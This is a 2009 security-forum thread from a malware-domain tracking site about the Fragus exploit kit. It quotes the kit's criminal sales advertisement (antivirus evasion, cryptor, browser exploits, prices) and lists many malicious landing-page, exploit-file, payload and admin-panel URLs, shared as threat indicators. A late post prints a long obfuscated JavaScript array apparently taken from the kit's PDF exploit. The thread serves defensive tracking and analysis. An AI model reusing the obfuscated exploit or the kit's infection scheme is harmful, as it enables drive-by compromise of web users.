Malware Domain List

Malware Related => Malicious Domains => Topic started by: SysAdMini on August 25, 2009, 08:56:53 pm

Title: Fragus exploit pack
Post by: SysAdMini on August 25, 2009, 08:56:53 pm
Found at http://vx.eof-project.net/viewtopic.php?pid=1706
Quote
Administrator Toolbar:
  • Attractive design
  • Multilingual interface (Russian, English)
  • Administrator Toolbar is protected by the password
  • Advanced statistics for browsers (including versions), operating systems, countries, exploits
  • Possibility to check urgent summary data without page reloading
  • Files are uploadet from Administrator Toolbar
  • Possibility to specify name of the file, with which Your EXE will be uploadet into the system
  • Possibility to distinguish traffic between Sellers and to keep Seller-by-Seller independent statistics
  • Possibility to indicate his own file for each Seller or to upload a random one
  • Possibility for each Seller to indicate his own kit from Exploit List, and also for total traffic, what makes possible to shut down exploits, inhibiting browser, for resource, where you can't be found
  • Possibility to give Seller a unique link on a separate page with statistics for data verification without authorization
  • Possibility both to clean general statistics and for each Seller separately
  • Fragus enables to watch over feedbacks of each exploit and to display it easy-to-use way; possibility to feedback on URL has many EXE
  • Also Fragus permits you to find quickly link on traffic as in open or encoded (encoded iframe) type for total traffic and for each Seller separately
  • All preferences are available right from Administrator Toolbar


System features:
  • Exploits imaging of high quality with possibility of checking with the help of ajax whether current exploit infects or not before loadint the next one. This option can be disabled in Administrator Toolbar
  • Possibility to edit host on necessary URL after it is done allows not to lose used traffic, and to utilize it pro domo sua. Also you can edit on a separate URL those, who visits exploits pack twice or more
  • Complete exploits modularity in th system. Your coder will be able to add them easily
  • Zero-written cryptor of exploits doesn't overload browser, but nevertheless protects exploits pack safely from antiviruses
  • Cryptor lies in separate file and if you want you can easily add you cryptor
  • Patterns of pages on exploits imaging, with the page for those who visits twice,lie separately, disguising as 404 error. And it won't be very difficult for you to edit them so it will suit your own ends
  • Patterns of Administrator Toolbar also lies separately, so those who doesn'y like our design can change it easily
  • Fragus hides from searchbots, what disables domain detection
  • Fragus is highly optimized for operating with massive traffic flows and minimum load on server
  • Installation will take less than 2 minutes. You don't have to get into file or edit smth manually. Installation wizard will hepl you


Exploits:
  • Mdac, still infects IE6 well enough
  • PDF: printf(), collectEmailInfo(), getIcon(). Exploit images only for those, who 100% has vulnerable version of Adobe Acrobat. It is arranged so, it can infect absolutely all browsers where this plugin is installed
  • MS DirectShow, large break increment
  • MS09-002 - for IE7
  • MS Spreadsheet, rather new exploit
  • AOL IWinAmp, infects rather nicely, almost like PDF
  • MS Snapshot with instantaneous run
  • MS COM finish IE6 off, if it doesn't break


Price:
800 USD
Exploits pack is sold with closed source code (IonCube)
Hiding of pack functioning from antiviruses (per Customer) - 30 USD
Zero-written cryptor (per Customer) - 150 USD
Large updates are paid

(http://img7.imageshost.ru/imgs/090727/93c702922a/t587e9.gif) (http://imageshost.ru/links/5e3310236fc3cf03f2749b8962f6164a)

(http://img7.imageshost.ru/imgs/090727/957a450e84/t815fc.gif) (http://imageshost.ru/links/ef14e8d9d14874c15f127f250b289e38)

(http://img7.imageshost.ru/imgs/090727/7ce86d16dd/t4460d.gif) (http://imageshost.ru/links/9137e6968878a9c3899f1886aa278274)

(http://img7.imageshost.ru/imgs/090727/bd34bcd064/tc560e.gif) (http://imageshost.ru/links/2860db9847258fd20c8c6f7d1ee9820b)

(http://img7.imageshost.ru/imgs/090727/95b59d9138/t805be.gif) (http://imageshost.ru/links/61437fa16e0e77cd357ac693c9bc1d9a)

(http://img7.imageshost.ru/imgs/090727/e206c762d5/ta9b8c.gif) (http://imageshost.ru/links/e3efb7f7fe5f54c7753e48b918de7bfe)


samples :

First you have to visit show.php. Otherwise you will receive only 404 for exploits and payload

exploits
Code: [Select]
fragtopmassage.ru/frag/show.phpflash exploit
Code: [Select]
fragtopmassage.ru/frag/swf.swfpdf exploit
Code: [Select]
fragtopmassage.ru/frag/pdf.pdfpayload
Code: [Select]
fragtopmassage.ru/frag/load.php?e=3control panel
Code: [Select]
fragtopmassage.ru/frag/admin.php
exploits
Code: [Select]
blt.kz/1/show.phpflash exploit
Code: [Select]
blt.kz/1/swf.swfpdf exploit
Code: [Select]
blt.kz/1/pdf.pdfpayload
Code: [Select]
blt.kz/1/load.php?e=3control panel
Code: [Select]
blt.kz/1/admin.php
Article from EvilFingers
http://evilfingers.blogspot.com/2009/08/fragus-new-botnet-framework-in-wild.html
Title: Re: Fragus exploit pack
Post by: SysAdMini on September 02, 2009, 07:25:54 pm
http://blog.purewire.com/bid/19509/The-Fragus-Exploit-Kit
Title: Re: Fragus exploit pack
Post by: SysAdMini on September 02, 2009, 08:13:27 pm
Fragus – crimeware in the wild
http://securitybananas.com/?p=134
Title: Re: Fragus exploit pack
Post by: paulroyal on September 02, 2009, 10:41:43 pm
New, seen 2009-09-01; not Google Blacklisted/etc:

Code: [Select]
tour6.info/tomer/show.php?s=2f2d557669
Title: Re: Fragus exploit pack
Post by: SysAdMini on September 08, 2009, 09:05:23 am
I came across 2 Fragus kits with almost undetected payloads.

Remember that you have to download show.php first.

Code: [Select]
cloudsregion.info/maner/show.php
cloudsregion.info/maner/load.php?e=2
http://www.virustotal.com/analisis/7ce9571bb83c2d13655b50e0fad2a98f69928e0d79202fa13f51e6e4eab1c1f8-1252397303 1/41


Code: [Select]
addvertseense.co.uk/show.php
addvertseense.co.uk/load.php?e=2
http://www.virustotal.com/analisis/26ad34c5afc858ef210493c530214b2162347bccf8e197f37e8b4c73da8900a3-1252397512 3/41
http://www.threatexpert.com/report.aspx?md5=85050c8c96a3d35b1ce981f7632c15b9

downloads

Code: [Select]
zstudio1.cn/v3/system/msvcr80.dllhttp://www.virustotal.comanalisis/02bdde38e4c6bd795a092d496b8d6060cdbe71e22ef4d7a204e3050c1be44fa9-1252399791 0/41
Title: Re: Fragus exploit pack
Post by: Malware-Web-Threats on September 10, 2009, 08:53:50 am
Code: [Select]
geroyvoin.cn/1/show.php?s=747bbfed51
geroyvoin.cn/1/cosx.ipg
geroyvoin.cn/1/manual.swf
geroyvoin.cn/1/cegmoprwx.pdf
geroyvoin.cn/1/jpy5.exe
geroyvoin.cn/1/bgmnrsyz3.exe
geroyvoin.cn/1/dprtz3.exe
geroyvoin.cn/1/dfpquz3.exe
geroyvoin.cn/1/degjt3.exe
geroyvoin.cn/1/bdflu3.exe
geroyvoin.cn/1/dfwx3.exe
geroyvoin.cn/1/admin.php

Wepawet (http://wepawet.iseclab.org/view.php?hash=c0111429a935628b86fb7be697fc2838&t=1252531195&type=js)
VirusTotal (http://www.virustotal.com/analisis/112946f35cf76ed853b44aeaf837cc5c9ad15722e46637e3af1f82b4b122f41b-1252531260) - 4/41 (9.76%)
Title: Re: Fragus exploit pack
Post by: Malware-Web-Threats on September 10, 2009, 10:31:50 am
213.163.84.28
Code: [Select]
sockslab.net/2/admin.php
Title: Re: Fragus exploit pack
Post by: Malware-Web-Threats on September 10, 2009, 12:10:37 pm
Code: [Select]
dmitrygaiduk.cn/show.php?s=1893da9ce4
dmitrygaiduk.cn/dgn.ipg
dmitrygaiduk.cn/adhlorvy.pdf
dmitrygaiduk.cn/bcluwy5.exe
dmitrygaiduk.cn/bgjmpqy2.exe
dmitrygaiduk.cn/cfku3.exe
dmitrygaiduk.cn/cjkosuwxy3.exe
dmitrygaiduk.cn/dfhjnwx3.exe
dmitrygaiduk.cn/dkmps3.exe
dmitrygaiduk.cn/hosuvwxz3.exe
dmitrygaiduk.cn/ilmry3.exe
dmitrygaiduk.cn/admin.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=7049447b1560e567bb3965572ae17556&t=1252583315&type=js)
VirusTotal (http://www.virustotal.com/analisis/06d12345e3379d6328e0bf0437ff73dd5369f99945b841d23927ee1a93897fb0-1252574565) - 2/41 (4.88%)

McAfee-GW-Edition: Heuristic.LooksLike.Win32.Suspicious.H!87
Panda: Suspicious file
Title: Re: Fragus exploit pack
Post by: SysAdMini on September 10, 2009, 05:31:53 pm
Fragus has been modified. It doesn't use static filenames for pdf exploits and payloads any longer.
Payloads are only downloadable for limited amount of time (some minutes).

All Fragus kits which we have seen before have used pdf.pdf for the pdf file, swf.swf for the Flash and
load.php for the payload. Now the filenames for the pdf file and the payload change randomly and at each request.
The name of the Flash file seems to be always manual.swf.
 

For examples look at the last postings of this thread

or see this one here:

I have checked hxxp://git77.biz/peg/show.php?s=ccc648c6ef multiple times.

Here are 2 results.
http://wepawet.cs.ucsb.edu/view.php?hash=6223f79cf6f195fc5589e50f8544bbbc&type=js
http://wepawet.cs.ucsb.edu/view.php?hash=a06d6231dfc563f09b4f2f4b4892605b&type=js
Title: Re: Fragus exploit pack
Post by: Malware-Web-Threats on September 10, 2009, 07:17:08 pm
can't find the correct path the these domains - seems to be related

Code: [Select]
gat77.biz
bot77.biz
http://www.bfk.de/bfk_dnslogger.html?query=91.212.198.3
http://www.malwaredomainlist.com/mdl.php?search=91.212.198.3&colsearch=All&quantity=50&inactive=on
Title: Re: Fragus exploit pack
Post by: SysAdMini on September 10, 2009, 07:20:55 pm
Quote from: Malware-Web-Threats on September 10, 2009, 07:17:08 pm
can't find the correct path the these domains - seems to be related

Code: [Select]
gat77.biz
bot77.biz

Haven't found the path, but one of our readers at Twitter sent me message that all 77.biz domains use the new version.
I guess those 2 domains are related.
Title: Re: Fragus exploit pack
Post by: SysAdMini on September 11, 2009, 05:18:36 pm
old format
Code: [Select]
bobunium.com/fr2/show.php?s=f801ff8253
new format
Code: [Select]
americaregion.info/born/show.php?s=dd6d6bb56c
busergondermags.com/f2hubba/show.php?s=019c9537bc
fartunaall.ru/task/show.php?s=e7e53d546c
Title: Re: Fragus exploit pack
Post by: Malware-Web-Threats on September 12, 2009, 08:27:00 am
Code: [Select]
got77.biz/peg/show.php?s=75dbfbfc1f
got77.biz/peg/chlnquxyz.pdf
got77.biz/peg/aeimnstxz3.exe
got77.biz/peg/chknz3.exe
got77.biz/peg/egijkmtx3.exe
got77.biz/peg/gjklmnrsy5.exe
got77.biz/peg/hwx3.exe
got77.biz/peg/inz3.exe
got77.biz/peg/mnqv2.exe
got77.biz/peg/optwx3.exe
got77.biz/peg/admin.php (control panel)
Wepawet (http://wepawet.iseclab.org/view.php?hash=d06bd282bdb11609fae8640705f9f587&t=1252743523&type=js)
Title: Re: Fragus exploit pack
Post by: WIEx on September 13, 2009, 11:46:59 am
Malware-Web-Threats )

PDF file filter in first section: ASCII85Decode, FlateDecode

Code: [Select]
var fra=[205,190,196,198,206,207,211,213,105,188,204,210,197,205,219,113,207,196,204,217,212,147,181,187,209,131,225,219,207,178,194,200,130,223,197,217,188,198,145,198,203,210,206,189,190,141,140,162,208,204,183,127,222,211,199,214,218,185,129,160,211,199,214,218,185,145,224,100,223,197,217,188,198,160,211,199,214,218,185,132,214,207,200,215,219,187,191,209,193,142,148,147,181,187,209,137,152,141,162,187,187,215,207,216,210,135,194,183,213,205,214,159,228,83,188,216,200,201,216,208,184,196,131,207,218,205,211,168,198,213,195,212,216,205,113,127,222,208,199,214,135,185,183,220,198,213,197,203,134,203,209,191,217,199,200,185,187,139,124,139,217,157,125,143,147,127,219,149,159,138,135,136,207,150,148,151,121,123,216,146,168,148,151,110,203,150,138,154,148,140,190,138,147,146,168,137,220,129,152,152,142,139,217,151,125,138,147,127,219,152,151,129,152,136,207,158,166,151,125,123,216,138,154,152,151,110,203,149,138,150,168,140,190,136,147,138,150,137,220,124,154,147,138,139,217,151,121,141,166,127,219,148,151,128,141,136,207,150,149,158,125,123,216,141,153,167,154,110,203,153,142,169,148,140,190,138,147,146,168,137,220,128,142,150,138,139,217,159,139,134,166,127,219,148,170,125,134,136,207,157,148,159,139,123,216,155,170,149,170,110,203,152,146,158,166,140,190,155,165,138,158,137,220,129,152,147,147,139,217,154,125,138,147,127,219,152,151,129,154,136,207,158,166,158,140,123,216,141,169,153,159,110,203,151,142,156,165,140,190,154,148,143,167,137,220,123,152,168,140,139,217,159,139,155,149,127,219,169,169,142,153,136,207,155,165,155,143,123,216,146,153,153,153,110,203,152,144,171,165,140,190,139,152,146,159,137,220,126,140,147,142,139,217,159,139,139,154,127,219,151,170,128,137,136,207,157,152,159,139,123,216,145,158,151,154,110,203,169,141,150,151,140,190,142,165,143,156,137,220,123,134,154,144,139,217,173,124,134,150,127,219,167,160,124,137,136,207,155,148,155,130,123,216,155,170,152,152,110,203,169,160,153,151,140,190,134,169,141,156,137,220,122,138,165,159,139,217,154,129,134,150,127,219,155,155,143,136,136,207,169,149,151,129,123,216,138,170,167,173,110,203,169,155,150,151,140,190,155,165,142,150,137,220,126,142,168,160,139,217,173,129,137,165,127,219,169,156,128,139,136,207,158,166,156,142,123,216,140,154,152,157,110,203,166,141,150,151,140,190,142,165,144,156,137,220,125,142,147,157,139,217,156,127,142,165,127,219,148,154,122,153,136,207,158,166,171,124,123,216,146,167,148,155,110,203,166,141,150,151,140,190,139,168,143,172,137,220,140,137,152,138,139,217,158,141,142,167,127,219,153,158,121,142,136,207,168,156,156,123,123,216,157,167,151,154,110,203,152,156,158,165,140,190,151,149,159,158,137,220,143,156,169,160,139,217,154,123,156,169,127,219,156,169,140,134,136,207,172,150,173,128,123,216,142,172,165,172,110,203,154,143,168,156,140,190,140,152,140,171,137,220,138,152,154,146,139,217,160,129,140,153,127,219,165,169,127,140,136,207,169,148,154,124,123,216,144,151,166,159,110,203,147,138,156,152,140,190,139,147,138,150,137,220,126,138,153,146,139,217,158,123,140,155,127,219,151,156,127,139,136,207,151,167,153,125,123,216,145,154,154,160,110,203,152,142,155,148,140,190,152,155,143,153,137,220,143,153,164,155,139,217,158,140,134,167,127,219,153,156,143,156,136,207,158,166,151,125,123,216,146,153,170,159,110,203,147,157,169,152,140,190,140,166,156,150,137,220,142,134,155,155,139,217,156,121,143,155,127,219,154,173,127,142,136,207,152,169,157,142,123,216,144,158,154,155,110,203,154,140,157,153,140,190,140,167,144,169,137,220,139,142,152,142,139,217,155,142,142,168,127,219,169,170,121,155,136,207,155,153,173,143,123,216,147,153,148,155,110,203,150,141,155,148,140,190,139,147,157,150,137,220,126,140,152,138,139,217,156,126,142,165,127,219,156,154,121,138,136,207,157,170,170,123,123,216,157,152,156,154,110,203,152,140,154,167,140,190,152,155,143,150,137,220,122,151,150,144,139,217,158,121,136,169,127,219,153,156,143,156,136,207,155,166,151,125,123,216,143,156,153,158,110,203,156,146,168,156,140,190,142,164,160,171,137,220,143,156,147,159,139,217,151,125,139,152,127,219,148,151,127,151,136,207,170,155,173,143,123,216,145,154,154,159,110,203,154,138,157,152,140,190,136,169,141,167,137,220,127,141,149,160,139,217,158,125,140,169,127,219,151,158,124,141,136,207,156,150,153,142,123,216,145,167,154,160,110,203,154,138,152,170,140,190,140,154,144,155,137,220,127,138,149,160,139,217,158,121,140,167,127,219,155,155,128,136,136,207,153,151,158,128,123,216,144,155,150,172,110,203,153,143,157,156,140,190,134,147,138,150,134,144,132,204,196,204,134,210,214,185,147,216,200,203,215,202,170,198,200,130,136,137,220,121,151,147,155,139,217,151,138,134,164,127,219,148,168,121,151,136,207,150,165,151,138,120,140,100,220,197,217,105,190,200,187,214,198,211,184,185,206,151,212,211,215,116,198,196,211,210,211,200,173,145,217,187,216,132,201,178,189,197,198,213,199,210,134,203,209,191,217,199,200,185,187,139,124,139,217,151,138,134,164,127,219,148,168,121,151,133,131,161,218,200,187,118,203,191,199,200,204,187,201,204,212,203,161,153,121,145,217,187,216,132,218,185,200,196,211,163,204,204,170,186,200,204,217,205,225,174,129,203,191,199,212,201,181,197,198,197,148,208,204,183,189,215,194,161,219,207,178,194,200,130,200,205,206,171,194,210,189,209,146,211,174,196,202,206,206,160,218,185,200,196,211,143,223,201,178,189,197,198,213,199,210,116,147,197,195,205,198,211,184,185,206,149,227,110,221,170,200,131,192,207,208,211,171,194,210,189,209,161,201,178,189,197,198,213,199,210,119,201,216,188,217,216,217,178,196,202,130,150,144,218,185,200,196,211,143,159,221,170,200,131,188,210,211,202,180,147,197,195,205,198,211,184,185,206,136,217,217,201,188,202,213,195,212,203,143,121,130,197,195,205,198,211,184,185,206,136,210,201,213,176,202,203,135,217,212,217,170,207,140,149,221,204,208,181,187,139,188,210,211,202,180,132,207,191,212,203,219,177,129,214,202,216,197,224,133,134,219,142,150,148,151,121,127,222,188,210,211,202,180,147,197,198,213,199,210,116,184,207,201,201,207,146,175,191,207,198,200,208,214,172,193,158,215,112,218,200,187,118,208,191,211,195,200,187,200,196,211,163,210,204,192,118,164,204,216,197,224,113,127,158,192,213,214,143,191,183,213,122,207,161,151,132,191,159,139,154,148,151,132,191,142,133,143,223,212,174,195,194,187,216,214,200,194,177,204,183,163,198,211,184,185,206,133,206,201,200,185,184,207,201,201,207,162,198,96,217,187,216,132,213,190,195,160,139,152,157,160,130,143,156,147,159,157,160,130,143,156,147,159,157,160,130,143,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,159,220,189,191,207,136,214,214,208,183,202,201,130,136,137,155,126,134,147,138,204,134,147,183,203,208,131,161,225,113,175,203,209,189,218,205,214,183,118,198,201,210,208,200,171,181,200,199,199,205,211,113,127,222,208,199,214,135,188,190,200,198,210,199,214,173,187,160,207,212,201,218,172,183,211,191,142,134,140,190,140,151,147,150,137,220,122,142,164,139,139,217,151,121,134,147,127,219,156,169,121,134,136,207,153,148,155,121,123,216,142,150,156,169,110,203,155,156,155,152,140,190,134,151,142,150,137,220,125,134,155,156,139,217,159,139,134,151,127,219,148,155,125,134,136,207,152,148,151,141,123,216,140,150,148,151,110,203,150,158,150,148,140,190,134,147,145,169,137,220,121,134,154,145,139,217,151,122,141,151,127,219,151,154,140,137,136,207,156,152,170,121,123,216,142,150,156,169,110,203,154,146,153,148,140,190,142,165,138,169,137,220,121,153,151,138,139,217,158,121,142,165,127,219,165,171,122,153,136,207,155,156,159,139,123,216,159,168,148,159,110,203,155,156,150,157,140,190,137,151,142,150,137,220,125,134,155,158,139,217,159,139,141,166,127,219,151,170,126,142,136,207,154,152,157,138,123,216,158,151,153,168,110,203,149,156,171,150,140,190,142,165,159,152,137,220,142,152,168,157,139,217,156,138,138,169,127,219,156,154,126,136,136,207,155,154,172,138,123,216,143,155,156,160,110,203,152,144,150,152,140,190,142,165,143,157,137,220,124,153,154,141,139,217,158,125,142,165,127,219,155,159,124,137,136,207,172,151,151,124,123,216,146,168,153,157,110,203,149,138,157,154,140,190,156,150,138,153,137,220,140,143,150,141,139,217,156,121,138,156,127,219,165,171,125,135,136,207,172,170,154,124,123,216,138,172,151,157,110,203,148,142,168,169,140,190,137,155,138,153,137,220,128,138,169,140,139,217,170,122,134,155,127,219,148,171,140,156,136,207,172,165,151,124,123,216,159,168,152,151,110,203,152,146,171,170,140,190,156,155,141,168,137,220,142,139,154,143,139,217,159,139,139,168,127,219,150,155,125,140,136,207,169,151,151,124,123,216,146,168,154,157,110,203,151,146,150,167,140,190,139,153,146,168,137,220,121,137,148,157,139,217,159,139,154,150,127,219,156,168,121,138,136,207,169,151,151,124,123,216,143,171,153,173,110,203,166,141,155,148,140,190,141,167,146,170,137,220,126,141,147,146,139,217,169,129,139,149,127,219,167,168,124,137,136,207,155,166,159,138,123,216,155,152,169,159,110,203,169,160,172,170,140,190,137,149,160,172,137,220,129,152,166,138,139,217,173,123,156,154,127,219,152,173,138,155,136,207,157,153,169,129,123,216,144,155,150,172,110,203,164,156,157,156,140,190,143,155,144,156,137,220,138,152,153,144,139,217,170,121,137,150,127,219,154,152,139,142,136,207,150,148,157,125,123,216,143,150,148,151,110,203,152,142,156,156,140,190,141,149,144,158,137,220,124,139,153,143,139,217,152,140,136,151,127,219,155,155,127,143,136,207,155,152,156,121,123,216,156,158,153,154,110,203,169,157,167,165,140,190,141,166,138,170,137,220,126,139,169,160,139,217,159,139,134,151,127,219,156,154,143,142,136,207,150,167,170,125,123,216,144,169,166,151,110,203,168,138,158,165,140,190,139,147,147,158,137,220,127,156,153,146,139,217,153,142,140,168,127,219,154,159,127,138,136,207,157,150,158,126,123,216,144,170,154,170,110,203,165,146,155,152,140,190,138,168,146,171,137,220,142,153,147,159,139,217,156,126,156,169,127,219,157,154,121,138,136,207,153,151,156,121,123,216,143,150,167,151,110,203,152,144,155,148,140,190,139,152,146,168,137,220,129,137,147,142,139,217,158,143,153,149,127,219,167,153,129,137,136,207,155,150,155,140,123,216,156,158,153,151,110,203,148,155,153,154,140,190,141,147,140,172,137,220,126,139,169,160,139,217,156,139,134,151,127,219,153,157,126,141,136,207,159,156,169,129,123,216,146,167,170,172,110,203,169,160,150,169,140,190,134,151,143,155,137,220,121,134,153,155,139,217,171,128,156,169,127,219,155,155,127,142,136,207,157,148,158,125,123,216,140,172,151,168,110,203,153,145,152,170,140,190,141,151,144,172,137,220,124,141,150,145,139,217,157,123,136,168,127,219,155,168,127,143,136,207,157,148,153,143,123,216,144,157,154,156,110,203,153,140,152,170,140,190,140,156,144,153,137,220,128,135,153,160,139,217,158,138,141,155,127,219,150,172,124,137,136,207,157,156,157,126,123,216,138,150,154,156,107,127,158,208,199,214,135,182,187,208,185,199,214,217,170,207,160,200,203,219,135,138,200,213,187,223,140,144,132,204,196,204,134,199,202,134,134,219,138,201,148,202,121,185,147,189,161,218,200,187,118,196,190,202,214,164,121,206,151,138,150,148,151,121,145,217,187,216,132,218,172,181,207,191,212,161,218,177,187,207,198,201,211,203,174,132,207,191,212,203,219,177,128,149,149,220,197,217,105,194,200,200,163,197,203,173,200,144,130,217,199,198,181,187,209,133,150,220,154,129,127,158,208,199,214,135,194,183,213,205,214,161,220,183,187,214,189,199,212,204,113,120,136,207,159,148,160,121,123,216,147,150,157,151,107,127,158,211,199,214,218,185,147,201,195,222,195,208,189,126,220,187,216,215,215,117,194,200,200,143,159,221,170,200,131,189,213,217,213,189,136,160,130,201,199,148,121,206,151,138,150,148,151,121,127,146,187,202,200,217,132,188,210,204,142,218,200,187,118,198,201,219,210,219,134,134,158,189,213,217,213,189,146,198,201,219,210,219,123,145,198,201,219,210,219,116,129,140,213,211,201,212,168,183,213,204,199,221,194,172,197,216,200,218,193,164,194,183,213,205,214,143,218,177,187,207,198,201,211,203,174,145,224,100,220,197,217,105,197,217,191,216,202,211,184,205,160,207,212,201,218,172,183,211,191,142,134,140,190,134,198,138,201,137,220,121,185,147,189,136,141,162,192,190,204,198,203,140,214,191,187,213,192,210,211,222,119,194,200,200,205,216,207,133,138,151,147,155,150,144,196,197,217,191,216,202,211,184,205,142,151,213,218,204,187,188,207,201,221,159,228,83,202,203,195,217,146,202,184,194,207,187,200,183,219,184,200,200,151,169,211,211,181,183,197,136,201,211,211,181,187,198,206,171,209,200,178,194,172,200,204,211,143,196,201,216,188,208,158,137,107,130,208,205,205,158,214,191,187,213,192,210,211,222,198,127,158,215,112,202,220,183,185,215,195,213,210,135,172,197,207,198,199,198,198,176,187,215,195,201,211,213,113,127,222,195,204,140,200,185,198,145,190,213,199,149,140,197,207,198,199,198,149,176,187,215,163,201,211,213,114,209,217,187,216,132,200,187,200,220,151,212,201,222,105,151,213,204,199,221,143,114,145,217,187,216,132,221,191,198,200,206,206,221,200,134,203,209,191,217,199,200,185,187,139,124,139,217,157,125,143,147,127,219,149,159,138,135,136,207,150,148,151,121,123,216,146,168,148,151,110,203,150,138,154,148,140,190,138,147,146,168,137,220,129,152,152,142,139,217,151,125,138,147,127,219,152,151,129,152,136,207,158,166,151,125,123,216,138,154,152,151,110,203,149,138,150,168,140,190,136,147,138,150,137,220,124,154,147,138,139,217,151,121,141,166,127,219,148,151,128,141,136,207,150,149,158,125,123,216,141,153,167,154,110,203,153,142,169,148,140,190,138,147,146,168,137,220,128,142,150,138,139,217,159,139,134,166,127,219,148,170,125,134,136,207,157,148,159,139,123,216,155,170,149,170,110,203,152,146,158,166,140,190,155,165,138,158,137,220,129,152,147,147,139,217,154,125,138,147,127,219,152,151,129,154,136,207,158,166,158,140,123,216,141,169,153,159,110,203,151,142,156,165,140,190,154,148,143,167,137,220,123,152,168,140,139,217,159,139,155,149,127,219,169,169,142,153,136,207,155,165,155,143,123,216,146,153,153,153,110,203,152,144,171,165,140,190,139,152,146,159,137,220,126,140,147,142,139,217,159,139,139,154,127,219,151,170,128,137,136,207,157,152,159,139,123,216,145,158,151,154,110,203,169,141,150,151,140,190,142,165,143,156,137,220,123,134,154,144,139,217,173,124,134,150,127,219,167,160,124,137,136,207,155,148,155,130,123,216,155,170,152,152,110,203,169,160,153,151,140,190,134,169,141,156,137,220,122,138,165,159,139,217,154,129,134,150,127,219,155,155,143,136,136,207,169,149,151,129,123,216,138,170,167,173,110,203,169,155,150,151,140,190,155,165,142,150,137,220,126,142,168,160,139,217,173,129,137,165,127,219,169,156,128,139,136,207,158,166,156,142,123,216,140,154,152,157,110,203,166,141,150,151,140,190,142,165,144,156,137,220,125,142,147,157,139,217,156,127,142,165,127,219,148,154,122,153,136,207,158,166,171,124,123,216,146,167,148,155,110,203,166,141,150,151,140,190,139,168,143,172,137,220,140,137,152,138,139,217,158,141,142,167,127,219,153,158,121,142,136,207,168,156,156,123,123,216,157,167,151,154,110,203,152,156,158,165,140,190,151,149,159,158,137,220,143,156,169,160,139,217,154,123,156,169,127,219,156,169,140,134,136,207,172,150,173,128,123,216,142,172,165,172,110,203,154,143,168,156,140,190,140,152,140,171,137,220,138,152,154,146,139,217,160,129,140,153,127,219,165,169,127,140,136,207,169,148,154,124,123,216,144,151,166,159,110,203,147,138,156,152,140,190,139,147,138,150,137,220,126,138,153,146,139,217,158,123,140,155,127,219,151,156,127,139,136,207,151,167,153,125,123,216,145,154,154,160,110,203,152,142,155,148,140,190,152,155,143,153,137,220,143,153,164,155,139,217,158,140,134,167,127,219,153,156,143,156,136,207,158,166,151,125,123,216,146,153,170,159,110,203,147,157,169,152,140,190,140,166,156,150,137,220,142,134,155,155,139,217,156,121,143,155,127,219,154,173,127,142,136,207,152,169,157,142,123,216,144,158,154,155,110,203,154,140,157,153,140,190,140,167,144,169,137,220,139,142,152,142,139,217,155,142,142,168,127,219,169,170,121,155,136,207,155,153,173,143,123,216,147,153,148,155,110,203,150,141,155,148,140,190,139,147,157,150,137,220,126,140,152,138,139,217,156,126,142,165,127,219,156,154,121,138,136,207,157,170,170,123,123,216,157,152,156,154,110,203,152,140,154,167,140,190,152,155,143,150,137,220,122,151,150,144,139,217,158,121,136,169,127,219,153,156,143,156,136,207,155,166,151,125,123,216,143,156,153,158,110,203,156,146,168,156,140,190,142,164,160,171,137,220,143,156,147,159,139,217,151,125,139,152,127,219,148,151,127,151,136,207,170,155,173,143,123,216,145,154,154,159,110,203,154,138,157,152,140,190,136,169,141,167,137,220,127,141,149,160,139,217,158,125,140,169,127,219,151,158,124,141,136,207,156,150,153,142,123,216,145,167,154,160,110,203,154,138,152,170,140,190,140,154,144,155,137,220,127,138,149,160,139,217,157,138,140,154,127,219,154,172,127,153,136,207,153,151,158,124,123,216,144,155,150,172,110,203,153,143,157,156,140,190,134,147,138,150,134,144,132,204,196,204,134,204,190,186,139,147,138,169,178,164,191,204,211,191,218,204,224,170,132,207,191,212,203,219,177,128,149,149,220,197,217,105,194,200,200,163,148,223,125,134,147,138,150,148,148,113,190,186,203,155,148,151,140,164,142,138,222,151,159,114,145,217,187,216,132,224,170,200,214,202,163,217,213,174,201,198,187,214,201,143,107,123,216,147,150,157,151,110,203,156,138,159,148,137,114,145,220,187,216,215,215,134,188,204,210,197,205,219,113,207,196,204,217,212,147,181,187,209,131,161,218,200,187,118,211,143,167,206,178,127,139,201,151,142,148,223,121,185,147,189,150,199,151,172,131,147,210,154,148,151,121,134,147,131,149,148,223,125,134,147,138,150,148,162,175,197,213,130,220,197,217,105,204,212,189,183,168,160,127,207,160,138,161,218,216,172,167,167,147,156,221,163,185,139,164,196,177,154,156,175,145,217,203,201,181,171,130,140,220,133,145,141,226,170,200,213,211,193,218,216,172,167,167,147,156,221,196,134,207,196,204,217,212,146,191,204,211,191,218,204,224,170,145,224,100,220,197,217,105,202,184,167,206,178,201,144,205,160,207,212,201,218,172,183,211,191,142,134,140,121,143,133,131,161,219,207,178,194,200,130,218,185,180,177,164,197,161,221,146,211,174,196,202,206,206,160,151,193,138,147,138,150,141,226,189,171,176,194,180,198,174,192,129,160,206,187,177,207,151,184,170,209,161,225,113,189,171,176,194,180,198,174,192,147,133,168,148,134,146,189,171,176,194,180,198,174,192,145,196,202,214,146,203,184,185,145,157,213,208,211,170,184,145,193,203,216,176,172,197,209,130,218,185,180,177,164,197,161,221,141,162,198,211,109,192,219,210,202,189,191,210,200,134,212,203,175,181,214,206,199,214,219,113,127,222,208,199,214,135,191,187,213,205,207,211,213,134,183,211,202,148,218,208,174,205,200,204,188,201,217,188,191,210,200,148,216,214,156,202,213,195,212,203,143,114,145,217,191,216,215,208,184,196,160,208,203,214,218,178,197,209,136,216,201,215,181,183,